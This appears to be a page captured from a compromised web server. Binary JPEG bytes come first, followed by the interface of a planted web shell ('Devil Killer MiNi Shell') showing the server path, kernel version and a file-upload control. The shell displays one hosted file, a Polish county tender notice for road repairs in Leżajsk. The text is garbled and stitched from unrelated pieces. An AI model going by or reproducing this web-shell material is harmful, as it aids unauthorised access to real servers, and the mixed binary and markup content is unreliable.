JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240321/0025513101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont cząstkowy dróg powiatowych emulsją i grysami oraz mieszanką mineralno-asfaltową w roku 2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W LEŻAJSKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690587410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Polna 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Leżajsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">172421181</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kontakt@zdplezajsk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zdplezajsk.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont cząstkowy dróg powiatowych emulsją i grysami oraz mieszanką mineralno-asfaltową w roku 2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-64fd4b6c-e777-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00255131</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00076906/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont cząstkowy dróg powiatowych emulsją i grysem oraz mieszanką mineralno asfaltową w roku 2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdp_lezajsk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami, odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem platformazakupowa.pl pod adresem<br/>https://platformazakupowa.pl/pn/zdp_lezajsk, zwanej dalej Platformą. Wykonawcy winni zapoznać się z Regulaminem Platformy,<br/>znajdującym się na stronie https://platformazakupowa.pl/strona/1-regulamin, oraz Instrukcjami dla Wykonawców (link:<br/>https://platformazakupowa.pl/strona/45-instrukcje ), w których zawarto wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: kontakt@zdplezajsk.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawcy winni zapoznać się z<br/>Regulaminem Platformy, znajdującym się na stronie https://platformazakupowa.pl/strona/1-regulamin, oraz Instrukcjami dla<br/>Wykonawców (link: https://platformazakupowa.pl/strona/45-instrukcje ), w których zawarto wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, powinien posiadać konto na<br/>Platformie. Rejestracja i konto na Platformie jest darmowe. Sposób założenia konta opisany został w instrukcji znajdującej się pod<br/>linkiem: https://docs.google.com/document/d/1CETIe4hPE_fnKCUjWGpnw9yWhdbtc0YTlqtgUxMAwRo/edit<br/>Wykonawca posiadający konto na Platformie ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do<br/>komunikacji.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na strony<br/>https://platformazakupowa.pl/pn/zdp_lezajsk<br/>Formaty plików muszą być zgodne z krajowymi Ramami Interoperacyjności, o których mowa w Rozporządzeniu Rady Ministrów z<br/>dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych(t. j. Dz. U. z 2017r. poz. 2247).<br/>Zalecenia:<br/>• Zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .docx, .xls, .jpg ze szczególnym wskazaniem na .pdf<br/>• W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów .zip, 7Z<br/>W przypadku podpisania dokumentu elektronicznego kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym osoba składająca taki podpis musi być umocowana w imieniu wykonawcy zgodnie z obowiązującymi przepisami.<br/>Zaleca się, aby przed rozpoczęciem wypełniania Formularza składania oferty wykonawca zalogował się do systemu, a jeżeli nie<br/>posiada konta, założył bezpłatne konto. W przeciwnym wypadku wykonawca będzie miał ograniczone funkcjonalności, np. brak<br/>widoku wiadomości prywatnych od zamawiającego w systemie lub wycofania oferty bez kontaktu z Centrum Wsparcia Klienta.<br/>Wykonawca składa ofertę, za pośrednictwem Formularza składania oferty dostępnego na<br/>https://platformazakupowa.pl/pn/zdp_lezajsk w konkretnym postępowaniu w sprawie udzielenia zamówienia publicznego.<br/>W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami, w szczególności składanie oświadczeń, zawiadomień, oraz przekazywanie informacji odbywa się elektronicznie za<br/>pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”, (nie dotyczy składania ofert, gdyż<br/>wiadomości nie są szyfrowane).<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej na adres<br/>email: biuro@zdplezajsk.pl<br/>11.3.3. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 roku w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>Szczegóły dotyczące wymagań technicznych i organizacyjnych zawarte są w pkt 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP.231.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont cząstkowy dróg powiatowych w zakresie: frezowania nawierzchni bitumicznej, stabilizacji podłoża cementempospółka<br/>do Rm=5 MPa, podbudowy z kruszywa łamanego, wykonania nawierzchni z mieszanki mineralno- asfaltowej,<br/>remontu cząstkowego nawierzchni masą grysową na asfalcie, zgodnie z przedmiarem robót stanowiącym załącznik nr 8 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty, stosując następujące kryteria:<br/>• Cena – 60 pkt<br/>• Doświadczenie kierownika budowy– 40 pkt<br/>Zasady oceny kryterium „Cena” (C)<br/>Kryterium „Cena”(C) - będzie rozpatrywana na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia wpisanej<br/>przez Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów (znaczenie w ocenie pkt = %). W<br/>przypadku kryterium „Cena”(C) - oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą ze wzoru:<br/>C = [ Cmin: Co] x 60 pkt<br/>gdzie:<br/>C – ilość punktów jakie otrzyma badana oferta za kryterium „Cena”<br/>Cmin – cena najniższa spośród wszystkich ważnych i nieodrzuconych ofert<br/>Co – cena badanej oferty<br/>Ceny należy podać z dokładnością do dwóch miejsc po przecinku.<br/>Zasady oceny kryterium „Doświadczenie kierownika budowy” (D)<br/>Kryterium „Doświadczenie kierownika budowy” (D) będzie rozpatrywane na podstawie wykazanego doświadczenia zawodowego<br/>Kierownika budowy „branży drogowej”, tj. ilości zadań polegających na budowie, przebudowie, odbudowie, rozbudowie lub remoncie<br/>dróg publicznych klasy technicznej min. L, którymi kierował (prowadził/ukończył) proponowany Kierownik budowy.<br/>D:<br/>Punkty zostaną przyznane w następujący sposób:<br/>Dla części nr 1:<br/>za wykazanie doświadczenia Kierownika budowy polegającego prowadzeniu<br/>i ukończeniu na stanowisku Kierownika budowy min.:<br/>- 2 zadań polegających na budowie, przebudowie, odbudowie, rozbudowie<br/>lub remoncie dróg publicznych klasy technicznej min. L o wartości min. o wartości min. 20 000,00 zł – 20 pkt<br/>- 3 i więcej zadań polegających na budowie, przebudowie, odbudowie, rozbudowie lub remoncie dróg publicznych klasy technicznej<br/>min. L o wartości min. o wartości min. 20 000,00 zł – 40 pkt<br/>W przypadku składania oferty na więcej niż jedną cześć zamówienia Zamawiający dopuszcza, aby Wykonawca w przedmiotowym<br/>postępowaniu posłużył się tą samą kadrą techniczną dla więcej niż jednej części oraz powyższa kadra techniczna może wykazywać<br/>to samo (jedno) doświadczenie dla więcej niż jednej części, pod warunkiem, że doświadczenie to spełnia warunki jednocześnie dla każdej z części, na którą Wykonawca składa ofertę.<br/>Wykonawca w tym kryterium może uzyskać maksymalnie 20 pkt;<br/>W przypadku niewskazania lub wskazania jednego wyżej opisanego doświadczenia kierownika budowy, Zamawiający przyjmie, że<br/>wskazana osoba spełnia jedynie minimalne warunki dotyczące posiadania określonych uprawnień i doświadczenia (warunki udziału w postępowaniu dot. zdolności technicznej i zawodowej – pkt 6.1.4 instrukcji dla wykonawców rozdz. I SWZ – kadra techniczna) i przyzna w tym kryterium dla danej osoby 0 pkt;<br/>Jeżeli Zamawiający będzie wzywał Wykonawcę do złożenia, uzupełnienia, poprawienia lub udzielenia wyjaśnień dotyczących<br/>wykazu osób, o którym mowa w pkt 8.6 niniejszej Instrukcji i w rezultacie prowadzić to będzie do zmiany Kierownika budowy, to w kryterium „Doświadczenie kierownika budowy” oferta otrzyma zero punktów.<br/>Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie ze wzorem:<br/>P= C+D<br/>gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium „cena”<br/>D – liczba punktów uzyskanych w kryterium „doświadczenie kierownika budowy”<br/>Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont cząstkowy przy użyciu grysów i emulsji, dróg powiatowych zgodnie z przedmiarem robót stanowiącym załącznik nr 8 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty, stosując następujące kryteria:<br/>• Cena – 60 pkt<br/>• Doświadczenie kierownika budowy– 40 pkt<br/>Zasady oceny kryterium „Cena” (C)<br/>Kryterium „Cena”(C) - będzie rozpatrywana na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia wpisanej<br/>przez Wykonawcę w formularzu oferty. W tym kryterium można uzyskać maksymalnie 60 punktów (znaczenie w ocenie pkt = %). W<br/>przypadku kryterium „Cena”(C) - oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą ze wzoru:<br/>C = [ Cmin: Co] x 60 pkt<br/>gdzie:<br/>C – ilość punktów jakie otrzyma badana oferta za kryterium „Cena”<br/>Cmin – cena najniższa spośród wszystkich ważnych i nieodrzuconych ofert<br/>Co – cena badanej oferty<br/>Ceny należy podać z dokładnością do dwóch miejsc po przecinku.<br/>Zasady oceny kryterium „Doświadczenie kierownika budowy” (D)<br/>Kryterium „Doświadczenie kierownika budowy” (D) będzie rozpatrywane na podstawie wykazanego doświadczenia zawodowego Kierownika budowy „branży drogowej”, tj. ilości zadań polegających na budowie, przebudowie, odbudowie, rozbudowie lub remoncie dróg publicznych klasy technicznej min. L, którymi kierował (prowadził/ukończył) proponowany Kierownik budowy.<br/>D:<br/>Punkty zostaną przyznane w następujący sposób:<br/>Dla części nr 2:<br/>za wykazanie doświadczenia Kierownika budowy polegającego na prowadzeniu<br/>i ukończeniu na stanowisku kierownika budowy min.:<br/>- 2 zadań polegających na budowie, przebudowie, odbudowie, rozbudowie<br/>lub remoncie dróg publicznych klasy technicznej min. L o wartości min. o wartości min. 45 000,00 zł – 20 pkt<br/>- 3 i więcej zadań polegających na budowie, przebudowie, odbudowie, rozbudowie lub remoncie dróg publicznych klasy technicznej<br/>min. L o wartości min. o wartości min. 45 000,00 zł – 40 pkt<br/>W przypadku składania oferty na więcej niż jedną cześć zamówienia Zamawiający dopuszcza, aby Wykonawca w przedmiotowym postępowaniu posłużył się tą samą kadrą techniczną dla więcej niż jednej części oraz powyższa kadra techniczna może wykazywać to samo (jedno) doświadczenie dla więcej niż jednej części, pod warunkiem, że doświadczenie to spełnia warunki jednocześnie dla każdej z części, na którą Wykonawca składa ofertę.<br/>Wykonawca w tym kryterium może uzyskać maksymalnie 20 pkt;<br/>W przypadku niewskazania lub wskazania jednego wyżej opisanego doświadczenia kierownika budowy, Zamawiający przyjmie, że<br/>wskazana osoba spełnia jedynie minimalne warunki dotyczące posiadania określonych uprawnień i doświadczenia (warunki udziału w postępowaniu dot. zdolności technicznej i zawodowej – pkt 6.1.4 instrukcji dla wykonawców rozdz. I SWZ – kadra techniczna) i przyzna w tym kryterium dla danej osoby 0 pkt;<br/>Jeżeli Zamawiający będzie wzywał Wykonawcę do złożenia, uzupełnienia poprawienia lub udzielenia wyjaśnień dotyczących wykazu osób, o którym mowa w pkt 8.6 niniejszej Instrukcji i w rezultacie prowadzić to będzie do zmiany Kierownika budowy, to w kryterium „Doświadczenie kierownika budowy” oferta otrzyma zero punktów.<br/>Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska łącznie największą liczbę punktów (P) wyliczoną zgodnie ze wzorem:<br/>P= C+D<br/>gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium „cena”<br/>D – liczba punktów uzyskanych w kryterium „doświadczenie kierownika budowy”<br/>Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne 